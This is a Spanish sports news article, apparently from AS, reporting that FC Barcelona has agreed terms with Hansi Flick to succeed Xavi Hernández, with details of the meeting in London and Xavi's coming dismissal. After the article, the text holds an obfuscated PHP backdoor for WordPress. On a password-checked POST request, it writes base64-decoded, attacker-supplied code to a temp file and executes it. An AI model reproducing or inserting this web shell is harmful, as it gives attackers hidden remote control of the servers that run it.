¡El Barça cierra a Hansi Flick!

El Barcelona, tras el viaje relámpago este miércoles de Deco y Krkic a Londres, habría atado el relevo de Xavi. El compromiso con el técnico alemán sería de dos años, según ha podido saber AS.

Hansi Flick será el próximo entrenador del FC Barcelona. El club blaugrana consiguió el sí del ex entrenador del Bayern de Múnich, tras un viaje relámpago este miércoles del director deportivo, Deco, y del miembro de la Comisión Deportiva, Bojan Krkic, a Londres. En esta cumbre, aparte de Flick, también se encontraba su agente, Pini Zahivi. Pese a los desmentidos de todas las partes implicadas, lo cierto es que finalmente se produjo este encuentro, que además acabó de forma satisfactoria, certificándose un principio de acuerdo con Flick, que avanzó ‘El Chiringuito’ y pudo confirmar AS, para que sea entrenador del FC Barcelona las dos próximas temporadas.

Evidentemente, el club ahora debe resolver la situación contractual de Xavi Hernández y el resto de su staff. Al técnico todavía nadie del Barça le ha comunicado nada de manera oficial -en AS ya adelantamos que el ex cuñado de Laporta, Alejandro Echevarría, le había dejado caer la posibilidad de buscar una salida pactada hace unos días-. Esta oficialidad no se plasmará hasta después del partido contra el Sevilla del domingo. Entre el lunes o el martes está prevista una reunión con la Comisión Deportiva donde se le explicará los motivos de su destitución, con Deco como maestro de ceremonias, ya que parte de la decisión se debe al informe que ha elaborado el director deportivo. Esta decisión deberá ser refrendada el jueves por la Junta Directiva, aunque en principio no se espera ninguna sorpresa: la mayor parte de los directivos ya abogaron por su marcha, antes de que fuera ratificado por Laporta en el célebre ‘pacto del sushi’.

El ‘quid’ de la cuestión es si habrá un acuerdo económico en la indemnización. Desde el entorno del técnico se asegura que el técnico estaría dispuesto a renunciar a una buena parte del año que le falta, siempre y cuando el club se comprometa a cumplir con el resto de sus ayudantes. En todo caso, hay que recordar que Xavi ya dejó muy claro cuando anunció a finales de enero su dimisión en diferido, que estaba dispuesto a renunciar a la totalidad del año.

No hay duda de que la situación de Xavi en estos momentos es muy delicada. Sin tener ninguna noticia oficial del club, con un ruido exterior ensordecedor, con la plantilla intentando aislarse del entorno de manera infructuosa y con el nombre de Hansi Flick ya en todas las quinielas, Xavi ha de planificar con profesionalidad el partido del domingo ante el Sevilla, y lo que es casi peor, hace frente a dos ruedas de prensa más.

Hay que recordar que Flick ya lleva tiempo en la órbita blaugrana. Desde que Xavi anunciara su destitución en diferido, el entrenador alemán se posicionó entre los favoritos de Laporta. Al alemán también le ayudaba el hecho de tener como agente a Zahivi, un hombre de la máxima confianza del presidente. Flick quiso demostrar desde el primer minuto su interés por fichar por el Barcelona, empezando a estudiar castellano y asimilando todos los conceptos futbolísticos del Barcelona. De hecho, hasta viajó a Brighton para ver al equipo de De Zerbi, al ser uno de los máximos exponentes del juego posicional y elogiado públicamente por Pep Guardiola. Su rechazo en los últimos días a dirigir el Chelsea, tras el anuncio de la marcha de Mauricio Pochettino, era un síntoma más de su deseo inalterable de sentarse en el banquillo del Barcelona.

Laporta siempre ha sido un defensor de la vía alemana. Nada más ser proclamado presidente, intentó sin éxito fichar a un entrenador de la escuela germana. Sus favoritos eran Julian Nagelsmann y Thomas Tuchel. Finalmente ninguno de los dos pudo venir, teniendo que quedarse con Ronald Koeman, al que fulminó a los tres meses de haber empezado la temporada.

El aval más importante que cuenta Flick es haber sido el artífice del Bayern de Múnich más exitoso de la historia, conquistando un sextete, y vapuleando además al Barcelona, en una de las humillaciones más históricas del club en Europa (2-8). Curiosamente, su paso por la entidad bávara fue relativamente efímero -dos temporadas, contabilizando 86 partidos-, asumiendo el cargo de seleccionador de Alemania, donde pasó sin pena ni gloria tras disputar 25 encuentros. De hecho, desde su paso por la ‘Mannschaft’, acumulaba ya casi ocho meses en el paro. Todo apunta que, a partir del 1 de julio, tendrá nuevo curro..

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}